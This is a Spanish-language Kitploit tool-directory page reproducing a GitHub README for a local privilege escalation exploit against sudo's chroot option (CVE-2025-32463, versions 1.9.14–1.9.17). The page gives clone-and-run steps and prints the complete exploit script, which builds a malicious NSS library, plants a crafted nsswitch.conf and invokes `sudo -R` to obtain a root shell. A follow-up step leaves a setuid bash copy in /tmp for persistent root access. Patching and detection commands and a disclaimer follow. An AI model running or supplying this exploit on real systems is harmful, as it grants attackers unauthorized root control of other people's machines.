Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-32463 — Exploit de escalada de privilegios local para CVE-2025-32463 que apunta al fallo de diseño de chroot en sudo. Proporciona un script de PoC, análisis técnico y orientación de mitigación para las versiones de sudo afectadas 1.9.14-1.9.17. | Kitploit
Herramientas/GitHubGitHub/kaiht-ladiant/cve-2025-32463
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónExplotación de Binarios
GitHubkaiht-ladiant/cve-2025-32463

CVE-2025-32463

Exploit de escalada de privilegios local para CVE-2025-32463 que apunta al fallo de diseño de chroot en sudo. Proporciona un script de PoC, análisis técnico y orientación de mitigación para las versiones de sudo afectadas 1.9.14-1.9.17.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
21hace 1 añoAún no revisado

CVE-2025-32463 - Exploit de Escalada de Privilegios en Sudo Chroot

Descripción General

CVE-2025-32463 es una vulnerabilidad crítica de escalada local de privilegios en las versiones de sudo 1.9.14 a 1.9.17. Esta vulnerabilidad permite a los atacantes con privilegios de sudo escalar al acceso root explotando un defecto de diseño en la lógica de procesamiento de la opción chroot.

Detalles de la Vulnerabilidad

  • CVE ID: CVE-2025-32463
  • Versiones Afectadas: sudo 1.9.14 - 1.9.17
  • Tipo de Vulnerabilidad: Escalada Local de Privilegios (LPE)
  • Severidad: Crítica
  • Versión Parcheada: sudo 1.9.17p1 y posteriores

Descripción Técnica

La vulnerabilidad se produce debido a un problema de temporización en el proceso de validación de seguridad de sudo. La función pivot_root se ejecuta antes de la verificación de la política de seguridad, lo que permite a los atacantes manipular el entorno del sistema de archivos que sudo utiliza para la autenticación y autorización.

Flujo del Ataque

  1. Manipulación del Entorno: El atacante crea un entorno chroot controlado con un nsswitch.conf malicioso
  2. Inyección de Biblioteca: Se coloca una biblioteca NSS (Name Service Switch) maliciosa en el entorno controlado
  3. Escalada de Privilegios: sudo carga y ejecuta la biblioteca maliciosa con privilegios de root
  4. Acceso Root: El atacante obtiene acceso completo a un shell root

Funciones Afectadas

  • pivot_root: Ejecutada demasiado pronto en el proceso
  • set_cmnd_path: Opera en el entorno manipulado
  • command_matches: Comprobaciones de seguridad omitidas debido a la manipulación del entorno

Requisitos Previos

Antes de usar este exploit, asegúrese de que se cumplan las siguientes condiciones:

  • El sistema objetivo ejecuta sudo versión 1.9.14 - 1.9.17
  • El usuario actual tiene privilegios de sudo
  • La configuración de sudoers permite operaciones chroot
  • El compilador gcc está disponible en el sistema objetivo
  • Acceso de escritura a directorios temporales (p. ej., /tmp)

Uso

Inicio Rápido

  1. Clone este repositorio:
root@kitploit:~
git clone https://github.com/KaiHT-Ladiant/CVE-2025-32463
cd CVE-2025-32463
  1. Haga ejecutable el script:
root@kitploit:~
chmod +x cve-2025-32463.sh
  1. Ejecute el exploit:
root@kitploit:~
./cve-2025-32463.sh

Verificación Manual

Compruebe si el sistema objetivo es vulnerable:

root@kitploit:~
# Check sudo version
sudo --version

# Check sudo privileges
sudo -l

# Look for chroot-related permissions
sudo -l | grep chroot

Código del Exploit

El script principal del exploit (cve-2025-32463.sh):

root@kitploit:~
#!/bin/bash
# CVE-2025-32463 PoC - Sudo Chroot Privilege Escalation
# Based on research by Rich Mirch @ Stratascale Cyber Research Unit

STAGE=$(mktemp -d /tmp/pentest.stage.XXXXXX)
cd ${STAGE?} || exit 1

cat > pentester.c<<'CEOF'
#include <stdlib.h>
#include <unistd.h>

void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  system("id > /tmp/pwned_proof.txt");
  system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash");
  execl("/bin/bash", "/bin/bash", NULL);
}
CEOF

mkdir -p pentest/etc libnss_
echo "passwd: /pentester" > pentest/etc/nsswitch.conf
cp /etc/group pentest/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/pentester.so.2 pentester.c

echo "[*] Exploiting CVE-2025-32463..."
echo "[*] Attempting privilege escalation..."
sudo -R pentest pentest

# Cleanup
rm -rf ${STAGE?}

Verificación

Después de una explotación exitosa, verifique el acceso root:

root@kitploit:~
# Check current privileges
whoami

# Check proof file
cat /tmp/pwned_proof.txt

# Use setuid bash for persistent root access
/tmp/rootbash -p

Mitigación

Acciones Inmediatas

  1. Actualice sudo a la versión 1.9.17p1 o posterior:

    root@kitploit:~
    # Ubuntu/Debian
    sudo apt update && sudo apt upgrade sudo
    
    # CentOS/RHEL
    sudo yum update sudo
    
    # or
    sudo dnf update sudo
    
  2. Elimine las directivas chroot de sudoers (solución temporal):

    root@kitploit:~
    # Backup current configuration
    sudo cp /etc/sudoers /etc/sudoers.backup
    
    # Remove chroot-related entries
    sudo sed -i '/chroot/d' /etc/sudoers
    
    # Verify syntax
    sudo visudo -c
    

Detección

Supervise los intentos de explotación:

root@kitploit:~
# Check for suspicious temporary directories
find /tmp -name "*.stage.*" -type d

# Monitor sudo logs
tail -f /var/log/auth.log | grep sudo

# Look for NSS library compilation
find /tmp -name "libnss_*.so*" -type f

Detalles Técnicos

Análisis de Causa Raíz

La vulnerabilidad se debe a un defecto de diseño en el flujo de ejecución de sudo:

  1. Flujo Normal Esperado:

    • Analizar la entrada del usuario
    • Validar la política de sudoers
    • Configurar el entorno (incluido chroot)
    • Ejecutar el comando
  2. Flujo Real Vulnerable:

    • Analizar la entrada del usuario
    • Ejecutar chroot (pivot_root) - El problema ocurre aquí
    • Validar la política de sudoers (en el entorno manipulado)
    • Ejecutar el comando

Explotación de la Biblioteca NSS

El exploit aprovecha el sistema Name Service Switch (NSS):

  1. Sudo lee /etc/nsswitch.conf para la autenticación de usuarios
  2. En el entorno chroot, el atacante controla este archivo
  3. La biblioteca NSS maliciosa se carga con privilegios de root
  4. El constructor de la biblioteca ejecuta código arbitrario como root

Entorno de Pruebas

Este exploit ha sido probado en:

  • Ubuntu 20.04/22.04 con sudo 1.9.15
  • Debian 11/12 con sudo 1.9.14-1.9.17
  • CentOS 8/9 con versiones afectadas de sudo
  • Contenedores Docker con instalaciones vulnerables de sudo

Referencias

  • Aviso de seguridad oficial de sudo
  • Investigación original de Rich Mirch
  • Análisis del código fuente de sudo

Descargo de Responsabilidad

⚠️ AVISO IMPORTANTE ⚠️

Esta herramienta se proporciona únicamente con fines educativos y de pruebas autorizadas.

  • Úsela únicamente en sistemas que le pertenezcan o para los que tenga permiso explícito de prueba
  • El uso no autorizado de este exploit es ilegal y poco ético
  • Los autores no son responsables de ningún uso indebido o daño
  • Asegúrese siempre de contar con la autorización adecuada antes de realizar pruebas de seguridad

Contribuciones

¡Las contribuciones son bienvenidas! Por favor:

  1. Haga un fork del repositorio
  2. Cree una rama de características
  3. Envíe una pull request con una descripción detallada

Licencia

Este proyecto está bajo la Licencia MIT; consulte el archivo LICENSE para obtener más detalles.

Registro de Cambios

v1.0.0

  • Versión inicial
  • Funcionalidad básica del exploit
  • Documentación completa

Nota: Esta vulnerabilidad afecta a un componente crítico del sistema. Úsela de forma responsable y asegúrese de que todas las pruebas estén autorizadas.

Descargar herramienta